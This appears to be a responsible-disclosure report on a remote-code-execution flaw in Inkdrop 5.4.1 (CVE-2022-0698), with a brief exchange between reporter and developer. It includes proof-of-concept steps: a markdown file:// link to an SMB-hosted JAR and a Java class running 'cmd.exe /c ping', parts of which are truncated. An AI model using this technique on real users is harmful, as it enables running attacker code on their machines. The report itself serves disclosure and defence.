Inkdrop 5.4.1 - RCE via file URI schemes

Our security team found a security issue inside InkDrop version 5.4.1. We have reserved the CVE-2022-0698 to refer to this issue. Attached below is the link to our responsible disclosure policy.

Bug description

InkDrop version 5.4.1 allows an attacker to create a malicious link inside a markdown file. When the victim clicks the link, the application opens the file using the default program. An attacker can abuse this, for example, to run a JAR file from an smb sever without warning the user.

CVSSv3 Vector:


CVSSv3 Base Score:


Steps to reproduce

  1. Create a markdown file with the following content.
[Click me](file://
  1. Create a malicious JAR file and host it in a SMB server. The following code can be converted into a JAR file using jar cvfe Exec.jar Exec *.class

class Exec {

    public static void main(String[] args) {
        String command="cmd.exe /c ping";
        try {
            Process process = Runtime.getRuntime().exec(command);
        } catch (IOException e) {
  1. Send the markdown file to the victim. When the victim clicks the markdown link the JAR file will be executed from the remote server.

It is important to validate the URI and file type before opening it. In this PoC the JAR file is executed without even notify the user.

Screenshots and files


System Information

  • Version: InkDrop version 5.4.1.
  • Operating System: Windows 10.0.19042 N/A Build 19042.
  • Installer: Inkdrop-demo-5.4.1-Windows

Hi Oscar,

Thanks for the report. I don’t understand the severity.
How easy can attackers let people run those jar files via SMB?

Hi Takuya,

A possible attack vector could be that an attacker sends a Markdown file with the malicious link and when the user sees the preview, clicks on it. Applications in electron must validate the links and at least warn the user while opening it because this can result in RCE.

But the attacker must be in the same local network as the target, no?